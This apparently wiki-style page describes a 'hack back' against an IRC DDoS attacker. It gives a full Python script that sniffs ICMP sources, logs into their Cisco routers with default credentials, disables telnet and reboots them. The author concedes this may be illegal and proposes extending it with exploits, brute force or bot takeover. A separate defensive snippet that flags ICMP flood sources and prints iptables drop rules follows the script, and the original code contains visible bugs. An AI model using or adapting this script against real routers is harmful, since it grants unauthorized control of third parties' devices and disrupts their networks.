DDoS Attacks/takedowns/Krashed
Subject Identification
- First encounter: 2600net, fail DDoS'd home router.
- Aliases: Krashed, [Krashed].
Upon joining my IRC network, Krashed DDoS'd it with his fail Cisco botnet. He scans for routers with the default login "cisco", then uses them in fail DDoS attacks. To combat this, I wrote the script below, which detects incoming ICMP packets (yes, he does use ICMP floods), then telnets back to the connection, logs in with "cisco", runs the enable command to elevate privileges, disables telnet and reboots the router to stop the running attack and prevent any future attacks. He could not put me down after this. It also has support for tcpdump logs and lists of IP addresses, in case you use it after the fact. While this script uses default passwords, it could be modified to use a Cisco IOS exploit or bruteforce the passwords, in case he gets smart (not likely, look at who we are dealing with here, he uses Ciscos). At the bottom, you will find a list of routers taken down by this script; if you happen to be an owner of one of these, please secure your devices, a full reset may be in order.
botnet-takedown.py
#!/usr/bin/python
# botnet-takedown.py
# (C) 2012 rorschach
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 1, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
# ----------------------------------------------------------------------
#
# Cisco botnet takedown script.
# Written by rorschach
# Use at your own risk, the actions taken by this app may not be legal.
#
# Run in daemon mode (-d) it will listen for ICMP packets, when it sees one
# it will attempt to attack the IP.
#
# In tcpdump parse mode (-t) it will parse a tcpdump log for offending
# IP addresses.
#
# In IP list mode (-i) it simply takes in a list of IP adresses to attack.
#
# This script will login to open Cisco routers, turn off telnet and
# then reboot it. The functionality could be modified to do things
# like take over the bot so only you can use it, turn the attack on
# the attacker, etc. The sky is really the limit here. Modify the
# takedown() function for this.
#
# Dependencies: python 2.x and scapy
# To install on Ubuntu:
#
# sudo apt-get install python-scapy
#
# This script must be ran as root if using daemon mode, due to the fact
# that it sniffs packets using scapy.
#
# Enjoy the script.

import sys, telnetlib, re, os, time, socket, threading
from threading import Thread
from scapy.all import *

def usage(argZero):
    print "Usage: " + argZero
    print " * -d -- Daemon mode, parse IPs live from incoming ICMP packets."
    print " * -t <tcpdump log> -- Parse IPs from tcpdump log."
    print " * -i <ip list> -- Load IPs from list."
    exit(1)

def takedown(ip):
    # Disable router using telnet.
    print " [*] Disabling " + ip.rstrip()
    try:
        tn = telnetlib.Telnet(ip,23,2)
        tn.read_until("Password:", timeout=2)
        # modify these commands to change functionality
        tn.write("cisco\n")
        tn.read_until(">", timeout=2)
        tn.write("enable\n")
        tn.read_until("Password:", timeout=2)
        tn.write("cisco\n")
        tn.read_until("#", timeout=2)
        tn.write("config\n")
        tn.read_until("Configuring from terminal, memory, or network [terminal]?", timeout=2)
        tn.write("\n")
        tn.read_until("(config)#", timeout=2)
        tn.write("line vty 0 4\n")
        tn.read_until("(config-line)#", timeout=2)
        tn.write("transport input none\n")
        tn.read_until("(config-line)#", timeout=2)
        tn.write("^Z\n")
        tn.read_until("#", timeout=2)
        tn.write("reload\n")
        tn.read_until("System configuration has been modified. Save? [yes/no]:", timeout=2)
        tn.write("yes\n")
        tn.read_until("Proceed with reload? [confirm]", timeout=2)
        tn.write("\n")
        tn.close()
    except:
        print " [*] Error: " + ip.rstrip()

def takedownParse(pkt,ips):
    # Parse packets, check to make sure it is an ICMP echo-request, then make sure
    # it has never been seen before, at that point run takedown()
    if(pkt.summary().split()[2] == "ICMP" and pkt.summary().split()[6] == "echo-request"):
        ip = pkt.summary().split()[3]
        check = 0
        for eip in ips:
            if ip.rstrip() == eip.rstrip():
                check = 1
                break
        if check == 0:
            ips.append(ip)
            f = open("/root/takedown.log", "a+")
            f.write(ip + "\r\n")
            f.close()
            t = threading.Thread(target=takedown,args=(ip,))
            t.start()

def loadIPs(file):
    # load IP list from file
    f = open(file, "r")
    ips = f.readlines()
    f.close()
    for ip in ips:
        takedown(ip.rstrip())

def parseDumpLogs(host, logFile):
    # parse tcpdump logs
    currentTime = time.time()
    num = 0
    print " [*] Initiating takedown"
    print " [*] Reading tcpdump file"
    f = open(logFile, "r")
    # open log, filter out non-icmp packets
    ips = f.readlines()
    for n,ip in enumerate(ips):
        try:
            if ip.split()[5] == "icmp":
                ips[n] = ip.split()[2].rstrip()
            else:
                ips[n] = "null"
        except:
            pass
    ips = list(set(ips)) # remove duplicates
    print " [*] Resolving hostnames to IP addresses"
    for n,ip in enumerate(ips):
        # if there is a letter in the IP, resolve it to an IP address
        if(re.search("[a-zA-Z]",ip) != None and ip != socket.gethostname() and ip != "null"):
            try:
                tempIP = socket.gethostbyname(ip)
                if(tempIP != None):
                    ips[n] = tempIP.rstrip()
            except:
                pass
    for n,ip in enumerate(ips):
        # remove extraneous data
        if(ip != socket.gethostname() and ip != "null" and ip != ""):
            if(ip.find(":") != -1):
                ips[n] = "null"
            else:
                num += 1
    print " [*] Taking down " + str(num) + " zombies"
    for ip in ips:
        # takedown each IP address
        if(ip != socket.gethostname() and ip != "null" and ip != ""):
            takedown(ip)
    print " [*] Takedown complete\r\n\r\nTook down " + str(num) + " IPs in " + str(time.time() / currentTime) + " seconds."

def takedownDaemon():
    # start sniffing and read IP log
    f = open("/root/takedown.log", "r")
    ips = f.readlines()
    f.close()
    print "\r\n -- IPs previously taken down -- \r\n"
    for ip in ips:
        print " [*] " + ip.rstrip()
    print "\r\n ------------------------------- \r\n"
    if os.fork() == 0:
        if os.fork() == 0:
            sniff(prn=lambda pkt:takedownParse(pkt,ips), store=0)

def main():
    print "botnet-takedown.py"
    if(len(sys.argv) < 2):
        usage(sys.argv[0])
    if(sys.argv[1] == "-d"):
        # daemon mode
        takedownDaemon(sys.argv[2])
    elif(sys.argv[1] == "-t"):
        # tcpdump logs
        if(len(sys.argv) == 3):
            parseDumpLogs(sys.argv[2])
        else:
            usage(sys.argv[0])
    elif(sys.argv[1] == "-i"):
        # ip log mode
        if(len(sys.argv) == 3):
            loadIPs(sys.argv[2])
        else:
            usage(sys.argv[0])
    else:
        usage(sys.argv[0])

if __name__ == "__main__":
    main()
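A defensive counterpart to the tcpdump-parsing mode of the script above, added here as an example and not part of rorschach's code: it reads the same tcpdump text format (source address in field 2, protocol after the destination), but counts ICMP echo requests per source per second and only flags sources whose peak rate reaches a threshold, then renders iptables drop rules for the operator to review and apply on the victim host. The sample log lines, addresses and threshold are constructed; it runs on Python 3.

```python
import re
from collections import Counter, defaultdict

# Constructed sample of tcpdump text output (not a real capture). Source
# 198.51.100.7 sends a burst of echo requests; 203.0.113.5 sends a single
# ping followed by ordinary TCP traffic, and one line is an echo reply.
SAMPLE_TCPDUMP = """\
12:00:00.000101 IP 198.51.100.7 > 192.0.2.10: ICMP echo request, id 1, seq 1, length 64
12:00:00.000202 IP 198.51.100.7 > 192.0.2.10: ICMP echo request, id 1, seq 2, length 64
12:00:00.000303 IP 198.51.100.7 > 192.0.2.10: ICMP echo request, id 1, seq 3, length 64
12:00:00.000404 IP 192.0.2.10 > 198.51.100.7: ICMP echo reply, id 1, seq 1, length 64
12:00:00.000505 IP 203.0.113.5 > 192.0.2.10: ICMP echo request, id 2, seq 1, length 64
12:00:00.000606 IP 203.0.113.5.443 > 192.0.2.10.51000: Flags [S.], seq 0, ack 1, win 65535, length 0
12:00:01.000707 IP 198.51.100.7 > 192.0.2.10: ICMP echo request, id 1, seq 4, length 64
"""

# Only IPv4 echo requests are matched; port-suffixed TCP/UDP addresses and
# IPv6 lines fall through, much as the page's script drops anything with ":".
ECHO_REQUEST_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2})\.\d+ IP (?P<src>\d{1,3}(?:\.\d{1,3}){3}) > "
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3}): ICMP echo request\b"
)

def echo_requests_per_second(log_text):
    """Map source IP -> {HH:MM:SS: number of echo requests in that second}."""
    buckets = defaultdict(Counter)
    for line in log_text.splitlines():
        m = ECHO_REQUEST_RE.match(line)
        if m:
            buckets[m.group("src")][m.group("ts")] += 1
    return buckets

def flood_sources(log_text, pps_threshold):
    """(source, peak requests/s) for sources whose peak reached pps_threshold,
    highest peak first. A lone ping never qualifies, unlike the page's daemon
    mode, which reacts to the first ICMP packet it sees."""
    peaks = {src: max(per_sec.values())
             for src, per_sec in echo_requests_per_second(log_text).items()}
    flagged = [(src, peak) for src, peak in peaks.items() if peak >= pps_threshold]
    return sorted(flagged, key=lambda item: (-item[1], item[0]))

def drop_rules(flagged):
    """Render iptables rules that drop echo requests from the flagged sources."""
    return ["iptables -A INPUT -s %s -p icmp --icmp-type echo-request -j DROP" % src
            for src, _ in flagged]

if __name__ == "__main__":
    print("\n".join(drop_rules(flood_sources(SAMPLE_TCPDUMP, pps_threshold=3))))
```

The threshold of 3 packets per second is only meaningful for this tiny sample; on a real capture, pick it from the host's normal ICMP baseline so that monitoring pings are not flagged.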
Routers
Note: some of these may be active again as the attack was in November.